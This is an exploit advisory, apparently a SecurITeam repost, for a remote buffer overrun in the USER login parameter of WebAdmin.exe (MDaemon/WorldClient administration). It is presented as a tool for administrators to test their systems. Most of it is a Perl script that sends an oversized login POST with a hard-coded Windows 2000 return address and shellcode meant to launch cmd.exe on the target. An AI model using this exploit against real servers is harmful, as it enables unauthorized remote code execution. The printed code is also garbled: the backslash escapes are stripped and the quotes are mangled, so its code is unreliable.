‘Exploit Released for Buffer Overrun in WebAdmin.exe’

Summary

WebAdmin allows administrators to securely manage MDaemon, RelayFax, and WorldClient from anywhere in the world. As we reported in our previous article: Remote System Buffer Overrun in WebAdmin.exe, there is a remotely exploitable buffer overrun in the USER parameter. The following exploit code can be used by administrators to test their system for the mentioned vulnerability.’

Credit:

‘The information has been provided by Noam Rathaus and Ami Chayun of SecurITeam Experts.’


Details

Exploit:
The exploit code below will simply open up a cmd.exe shell, the exploit code has been hard coded to use Windows 2000 addresses, though it is simple enough to modify it to use other addresses.

#!/usr/bin/perl
use IO::Socket;
unless (@ARGV == 1) { die ‘usage: $0 host …’ }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => ‘tcp’,
                                 PeerAddr => $host,
                                 PeerPort => ‘1000’,
                                 );
unless ($remote) { die ‘cannot connect to http daemon on $host’ }

$remote->autoflush(1);

$shellcode = join (”,
‘x90’, # – NOP
‘xCC’, # – INT3
‘x90’, # – NOP
‘x90’, # – NOP
‘x90’, # – NOP
‘x90’, # – NOP
‘x8BxEC’, # – MOV EBP, ESP
‘x55’, # – PUSH EBP
‘x8BxEC’, # – MOV EBP, ESP
‘x33xFF’, # – XOR EDI, EDI
‘x57’, # – PUSH EDI
‘x83xECx04’, # 0 SUB ESP, 4
‘xC6x45xF8x63’, # – MOV BYTE PTR SS:[EBP-8],63h
‘xC6x45xF9x6D’, # – MOV BYTE PTR SS:[EBP-7],6Dh
‘xC6x45xFAx64’, # – MOV BYTE PTR SS:[EBP-6],64h
‘xC6x45xFBx2E’, # – MOV BYTE PTR SS:[EBP-5],2Eh
‘xC6x45xFCx65’, # – MOV BYTE PTR SS:[EBP-4],65h
‘xC6x45xFDx78’, # – MOV BYTE PTR SS:[EBP-3],78h
‘xC6x45xFEx65’, # – MOV BYTE PTR SS:[EBP-2],65h
‘xB8xC3xAFx01x78’, # – MOV EAX, MSVCRT.system
‘x50’, # – PUSH EAX
‘x8Dx45xF8’, # – LEA EAX, DWORD PTR SS:[EBP-8]
‘x50’, # – PUSH EAX
‘xFFx55xF4’, # – CALL DWORD PTR SS:[EBP-C]
‘x5F’ # – POP EDI
);

$eip = ‘xD6xBFx53x07’;

$data = join(”, ‘User=’, ‘A’x168, $eip, $shellcode, ‘A’x1500, ‘&Password=foo&languageselect=en&Theme=Heavy&Logon=Sign+In’);

$data_length = length($data);

$request = join (”, ‘POST /WebAdmin.dll?View=Logon HTTP/1.1r
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*r
Referer: http://localhost:1000/r
Accept-Language: en-usr
Content-Type: application/x-www-form-urlencodedr
Accept-Encoding: gzip, deflater
User-Agent: MyUser Agentr
Host: localhostr
Content-Length: $data_lengthr
Connection: Keep-Aliver
Cache-Control: no-cacher
Cookie: User=SECURITEAM; Lang=en; Theme=Standardr
r
$data’);

print ‘Sending this [$request]n’;

print $remote $request;
sleep(1);

close $remote;’

Categories: Exploits